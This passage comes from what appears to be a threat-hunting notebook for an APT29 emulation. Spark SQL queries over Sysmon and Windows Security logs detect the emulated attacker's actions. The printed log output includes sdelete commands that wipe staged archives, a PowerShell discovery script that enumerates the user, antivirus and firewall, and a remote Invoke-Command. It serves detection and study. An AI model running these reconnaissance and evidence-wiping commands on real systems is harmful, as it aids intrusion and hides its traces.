      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND d.Image LIKE '%powershell.exe'
  ) e
  ON f.ParentProcessGuid = e.ProcessGuid
  WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND f.EventID = 1
    AND LOWER(f.Image) LIKE '%sdelete%'
    AND LOWER(f.CommandLine) LIKE '%draft.zip%'
) g
ON h.ProcessGuid = g.ProcessGuid
WHERE h.Channel = "Microsoft-Windows-Sysmon/Operational"
  AND h.EventID = 23

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message     | File Delete:
RuleName: -
UtcTime: 2020-05-02 03:03:14.765
ProcessGuid: {47ab858c-e2f2-5eac-d203-000000000400}
ProcessId: 8760
User: DMEVALS\pbeesly
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetFilename: C:\Users\pbeesly\ZZZZZZZZZZZZZZZZZZZZZ.ZZZ
Hashes: SHA1=B639091A8FA004CAA8E2D95DF4476374D7D09221,MD5=160FF0AB6AADF8ECD579C7667E4B2248,SHA256=EE85EAC531896E2203E33242A698EDB91305A6C124A98DF81F5FFF0341220150,IMPHASH=00000000000000000000000000000000
IsExecutable: false
Archived: true 
 CommandLine | "C:\Program Files\SysinternalsSuite\sdelete64.exe" /accepteula C:\Users\pbeesly\AppData\Roaming\Draft.Zip                                                                                                                                                                                                                                                                                                                                                                                                                       

Query ID:719618E8-9EE7-4693-937E-1FD39228DEBC

df = spark.sql(
'''
SELECT Message
FROM apt29Host h
INNER JOIN (
  SELECT f.ProcessGuid
  FROM apt29Host f
  INNER JOIN (
    SELECT d.ProcessId, d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND d.Image LIKE '%powershell.exe'
  ) e
  ON f.ParentProcessGuid = e.ProcessGuid
  WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND f.EventID = 1
    AND LOWER(f.Image) LIKE '%sdelete%'
    AND LOWER(f.CommandLine) LIKE '%draft.zip%'
) g
ON h.ProcessGuid = g.ProcessGuid
WHERE h.Channel = "Microsoft-Windows-Sysmon/Operational"
  AND h.EventID in (12,13)
  AND LOWER(h.TargetObject) RLIKE '.*\\\\\\\\software\\\\\\\\sysinternals\\\\\\\\sdelete.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:03:14.702
ProcessGuid: {47ab858c-e2f2-5eac-d203-000000000400}
ProcessId: 8760
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete\EulaAccepted
Details: DWORD (0x00000001) 
-RECORD 1-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: CreateKey
UtcTime: 2020-05-02 03:03:14.702
ProcessGuid: {47ab858c-e2f2-5eac-d203-000000000400}
ProcessId: 8760
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete                            
-RECORD 2-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: CreateKey
UtcTime: 2020-05-02 03:03:14.702
ProcessGuid: {47ab858c-e2f2-5eac-d203-000000000400}
ProcessId: 8760
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete                            

Query ID:5A19E46B-8328-4867-81CF-87518A3784B1

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
SELECT d.NewProcessId
FROM apt29Host d
INNER JOIN(
  SELECT a.ProcessId, a.NewProcessId
  FROM apt29Host a
  INNER JOIN (
    SELECT NewProcessId
    FROM apt29Host
    WHERE LOWER(Channel) = "security"
        AND EventID = 4688
        AND LOWER(NewProcessName) LIKE "%control.exe"
        AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
  ) b
  ON a.ProcessId = b.NewProcessId
  WHERE LOWER(a.Channel) = "security"
    AND a.EventID = 4688
    AND a.MandatoryLabel = "S-1-16-12288"
    AND a.TokenElevationType = "%%1937"
) c
ON d.ProcessId = c.NewProcessId
WHERE LOWER(d.Channel) = "security"
  AND d.EventID = 4688
  AND d.NewProcessName LIKE '%powershell.exe'
) e
ON f.ProcessId = e.NewProcessId
WHERE LOWER(f.Channel) = "security"
AND f.EventID = 4688
AND LOWER(f.NewProcessName) LIKE '%sdelete%'
AND LOWER(f.CommandLine) LIKE '%draft.zip'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x2238
	New Process Name:	C:\Program Files\SysinternalsSuite\sdelete64.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0xf24
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Program Files\SysinternalsSuite\sdelete64.exe" /accepteula C:\Users\pbeesly\AppData\Roaming\Draft.Zip

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

4.B.4. File Deletion

Procedure: Deleted SysinternalsSuite.zip on disk using SDelete

Criteria: sdelete64.exe deleting the file SysinternalsSuite.zip

Detection Type:Telemetry(Correlated)

Query ID:83D62033-105A-4A02-8B75-DAB52D8D51EC

df = spark.sql(
'''
SELECT Message, g.CommandLine
FROM apt29Host h
INNER JOIN (
  SELECT f.ProcessGuid, f.CommandLine
  FROM apt29Host f
  INNER JOIN (
    SELECT d.ProcessId, d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND d.Image LIKE '%powershell.exe'
  ) e
  ON f.ParentProcessGuid = e.ProcessGuid
  WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND f.EventID = 1
    AND LOWER(f.Image) LIKE '%sdelete%'
    AND LOWER(f.CommandLine) LIKE '%sysinternalssuite.zip%'
) g
ON h.ProcessGuid = g.ProcessGuid
WHERE h.Channel = "Microsoft-Windows-Sysmon/Operational"
  AND h.EventID = 23

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message     | File Delete:
RuleName: -
UtcTime: 2020-05-02 03:03:37.794
ProcessGuid: {47ab858c-e305-5eac-d303-000000000400}
ProcessId: 8848
User: DMEVALS\pbeesly
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetFilename: C:\Users\pbeesZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.ZZZ
Hashes: SHA1=A51DE96F19B0314067CCDD2D2A08C316367DC313,MD5=F86BF68DB45C99EDEBBB554A2091D272,SHA256=C0CE8A9099929ABF3728A9E050371EC80133EB3987A2374D9268789B50F05272,IMPHASH=00000000000000000000000000000000
IsExecutable: false
Archived: true 
 CommandLine | "C:\Program Files\SysinternalsSuite\sdelete64.exe" /accepteula C:\Users\pbeesly\Downloads\SysinternalsSuite.zip                                                                                                                                                                                                                                                                                                                                                                                                                       

Query ID:AC2ECFF0-D817-4893-BDED-F16B837C4DBA

df = spark.sql(
'''
SELECT Message
FROM apt29Host h
INNER JOIN (
  SELECT f.ProcessGuid
  FROM apt29Host f
  INNER JOIN (
    SELECT d.ProcessId, d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND d.Image LIKE '%powershell.exe'
  ) e
  ON f.ParentProcessGuid = e.ProcessGuid
  WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND f.EventID = 1
    AND LOWER(f.Image) LIKE '%sdelete%'
    AND LOWER(f.CommandLine) LIKE '%sysinternalssuite.zip%'
) g
ON h.ProcessGuid = g.ProcessGuid
WHERE h.Channel = "Microsoft-Windows-Sysmon/Operational"
  AND h.EventID in (12,13)
  AND LOWER(h.TargetObject) RLIKE '.*\\\\\\\\software\\\\\\\\sysinternals\\\\\\\\sdelete.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:03:33.997
ProcessGuid: {47ab858c-e305-5eac-d303-000000000400}
ProcessId: 8848
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete\EulaAccepted
Details: DWORD (0x00000001) 
-RECORD 1-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: CreateKey
UtcTime: 2020-05-02 03:03:33.997
ProcessGuid: {47ab858c-e305-5eac-d303-000000000400}
ProcessId: 8848
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete                            
-RECORD 2-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: CreateKey
UtcTime: 2020-05-02 03:03:33.997
ProcessGuid: {47ab858c-e305-5eac-d303-000000000400}
ProcessId: 8848
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete                            

Query ID:4D6DE690-E92C-4D60-93E6-8E5C7C4DF143

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
SELECT d.NewProcessId
FROM apt29Host d
INNER JOIN(
  SELECT a.ProcessId, a.NewProcessId
  FROM apt29Host a
  INNER JOIN (
    SELECT NewProcessId
    FROM apt29Host
    WHERE LOWER(Channel) = "security"
        AND EventID = 4688
        AND LOWER(NewProcessName) LIKE "%control.exe"
        AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
  ) b
  ON a.ProcessId = b.NewProcessId
  WHERE LOWER(a.Channel) = "security"
    AND a.EventID = 4688
    AND a.MandatoryLabel = "S-1-16-12288"
    AND a.TokenElevationType = "%%1937"
) c
ON d.ProcessId = c.NewProcessId
WHERE LOWER(d.Channel) = "security"
  AND d.EventID = 4688
  AND d.NewProcessName LIKE '%powershell.exe'
) e
ON f.ProcessId = e.NewProcessId
WHERE LOWER(f.Channel) = "security"
AND f.EventID = 4688
AND LOWER(f.NewProcessName) LIKE '%sdelete%'
AND LOWER(f.CommandLine) LIKE '%sysinternalssuite.zip'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x2290
	New Process Name:	C:\Program Files\SysinternalsSuite\sdelete64.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0xf24
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Program Files\SysinternalsSuite\sdelete64.exe" /accepteula C:\Users\pbeesly\Downloads\SysinternalsSuite.zip

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

4.C.1. File and Directory Discovery

Procedure: Enumerated user’s temporary directory path using PowerShell

Criteria: powershell.exe executing $env:TEMP

Detection Type:Telemetry(Correlated)

Query ID:85BFD73C-875E-4208-AD9E-1922D4D4D991

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:temp%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID:D18CF7B9-CBF0-40CE-9D07-12DC83AF3B2F

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:temp%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.2. System Owner/User Discovery

Procedure: Enumerated the current username using PowerShell

Criteria: powershell.exe executing $env:USERNAME

Detection Type:Telemetry(Correlated)

Query ID:A45F53ED-65CB-4739-A4D3-F2B0F08F86F8

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:username%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
Invoke-Command -ComputerName NASHUA -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId

ScriptBlock ID: 806f4593-7cce-4e2c-8645-8cb798c3bedd
Path:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             
-RECORD 1-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID:6F3D1615-69D6-41C6-90D0-39ACA14941BD

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$env:username%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
Invoke-Command -ComputerName NASHUA -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId

ScriptBlock ID: 806f4593-7cce-4e2c-8645-8cb798c3bedd
Path:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             
-RECORD 1-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
